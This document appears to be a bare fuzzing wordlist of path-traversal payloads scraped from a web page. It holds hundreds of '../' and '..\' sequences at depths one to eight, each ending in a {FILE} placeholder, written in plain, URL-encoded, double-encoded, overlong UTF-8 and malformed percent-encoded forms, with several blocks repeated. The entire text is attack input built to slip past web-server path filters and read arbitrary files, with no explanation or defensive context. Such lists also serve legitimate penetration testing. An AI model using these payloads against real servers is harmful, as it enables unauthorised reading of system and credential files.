..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
../{FILE}&lt;br /&gt;
../../{FILE}&lt;br /&gt;
../../../{FILE}&lt;br /&gt;
../../../../{FILE}&lt;br /&gt;
../../../../../{FILE}&lt;br /&gt;
../../../../../../{FILE}&lt;br /&gt;
../../../../../../../{FILE}&lt;br /&gt;
../../../../../../../../{FILE}&lt;br /&gt;
..%2f{FILE}&lt;br /&gt;
..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
..%252f{FILE}&lt;br /&gt;
..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
..\{FILE}&lt;br /&gt;
..\..\{FILE}&lt;br /&gt;
..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..%5c{FILE}&lt;br /&gt;
..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
..%255c{FILE}&lt;br /&gt;
..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
../{FILE}&lt;br /&gt;
../../{FILE}&lt;br /&gt;
../../../{FILE}&lt;br /&gt;
../../../../{FILE}&lt;br /&gt;
../../../../../{FILE}&lt;br /&gt;
../../../../../../{FILE}&lt;br /&gt;
../../../../../../../{FILE}&lt;br /&gt;
../../../../../../../../{FILE}&lt;br /&gt;
..%2f{FILE}&lt;br /&gt;
..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
..%252f{FILE}&lt;br /&gt;
..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
..\{FILE}&lt;br /&gt;
..\..\{FILE}&lt;br /&gt;
..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..%5c{FILE}&lt;br /&gt;
..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
